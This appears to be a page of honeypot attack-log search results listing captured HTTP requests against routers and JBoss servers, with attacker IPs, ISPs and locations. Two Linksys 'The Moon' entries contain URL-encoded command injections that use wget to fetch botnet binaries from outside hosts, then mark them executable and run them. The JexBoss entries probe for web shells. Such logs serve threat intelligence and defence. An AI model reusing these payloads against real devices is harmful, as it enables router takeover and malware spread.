1-10 of 151 results (16 pages)
Linksys "The Moon" Worm
[Attack info]
Attacker:
158.255.7.30
Dest. port: 8080
Time: 03/06/2020 05:50:11
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS49335 LLC Server v arendy
Location: Moscow, Moscow
rDNS: server.winac725.com
POST /tmUnblock.cgi HTTP/1.1
Content-Length: 227
accept-encoding: gzip, deflate
connection: keep-alive
Accept: /
User-Agent: python-requests/2.20.0
Host: 46.29.167.45:80
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F46.29.167.45%2Freaper%2Freap.mpsl%3B+chmod+777+reap.mpsl%3B+.%2Freap.mpsl+Reaper.linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&Start
Linksys "The Moon" Worm
[Attack info]
Attacker:
109.120.149.95
Dest. port: 8080
Time: 18/02/2019 02:32:28
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS30968 OOO "National Telecommunications"
Location: St.-Petersburg, St Petersburg
rDNS: srv-1086787-1
POST /HNAP1/ HTTP/1.1
Content-Length: 329
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 21.171.51.29:8080
referer: http://21.171.51.29:8080/
Content-Type: text/xml; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWLanRadios xmlns="http://purenetworks.com/HNAP1/">
</GetWLanRadios>
</soap:Body>
</soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
109.120.149.95
Dest. port: 8080
Time: 18/02/2019 02:32:27
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS30968 OOO "National Telecommunications"
Location: St.-Petersburg, St Petersburg
rDNS: srv-1086787-1
POST /HNAP1/ HTTP/1.1
Content-Length: 329
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 21.171.51.29:8080
referer: http://21.171.51.29:8080/
Content-Type: text/xml; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<IsDeviceReady xmlns="http://purenetworks.com/HNAP1/">
</IsDeviceReady>
</soap:Body>
</soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
37.194.218.167
Dest. port: 8080
Time: 26/12/2018 04:25:53
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS31200 Novotelecom Ltd
Location: Novosibirsk Oblast, Novosibirsk (Tsentralnyy)
rDNS: l37-194-218-167.novotelecom.ru
POST /tmUnblock.cgi HTTP/1.1
Content-Length: 227
accept-encoding: gzip, deflate
connection: keep-alive
Accept: */*
User-Agent: python-requests/2.20.0
Host: 192.168.0.14:80
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+set.mpsl%3B+wget+http%3A%2F%2Fcnc.flexsecurity.xyz%2Fbins%2Fset.mpsl%3B+chmod+777+set.mpsl%3B+.%2Fset.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&Start
JexBoss detector
[Attack info]
Attacker:
188.131.128.199
Dest. port: 8080
Time: 17/12/2018 00:01:14
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian (Haidian Qu)
GET /console/jspzxc.jsp?cmd=echo%20Hello%20D3c3mb3r HTTP/1.1
check-updates: false
connection: Keep-Alive
User-Agent: test
Host: 191.38.69.114:8080
no-check-updates: true
cache-control: no-cache
Content-Type: application/x-www-form-urlencoded
JexBoss detector
[Attack info]
Attacker:
188.131.128.199
Dest. port: 8080
Time: 17/12/2018 00:01:09
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian (Haidian Qu)
GET /jbossass/jbossass.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1
Host: 191.38.69.114:8080
cache-control: no-cache
Content-Type: application/x-www-form-urlencoded
connection: Keep-Alive
User-Agent: jexboss
JexBoss detector
[Attack info]
Attacker:
188.131.128.199
Dest. port: 8080
Time: 17/12/2018 00:01:04
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian (Haidian Qu)
GET /jexinv4/jexinv4.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1
check-updates: false
connection: Keep-Alive
User-Agent: test
Host: 191.38.69.114:8080
no-check-updates: true
cache-control: no-cache
Content-Type: application/x-www-form-urlencoded
JexBoss detector
[Attack info]
Attacker:
188.131.128.199
Dest. port: 8080
Time: 17/12/2018 00:01:00
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian (Haidian Qu)
GET /jexinv3/jexinv3.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1
check-updates: false
connection: Keep-Alive
User-Agent: test
Host: 191.38.69.114:8080
no-check-updates: true
cache-control: no-cache
Content-Type: application/x-www-form-urlencoded
JexBoss detector
[Attack info]
Attacker:
188.131.128.199
Dest. port: 8080
Time: 17/12/2018 00:00:56
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian (Haidian Qu)
GET /jexws4/jexws4.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1
check-updates: false
connection: Keep-Alive
User-Agent: test
Host: 191.38.69.114:8080
no-check-updates: true
cache-control: no-cache
Content-Type: application/x-www-form-urlencoded
JexBoss detector
[Attack info]
Attacker:
188.131.128.199
Dest. port: 8080
Time: 17/12/2018 00:00:51
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian (Haidian Qu)
GET /jexws3/jexws3.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1
check-updates: false
connection: Keep-Alive
User-Agent: test
Host: 191.38.69.114:8080
no-check-updates: true
cache-control: no-cache
Content-Type: application/x-www-form-urlencoded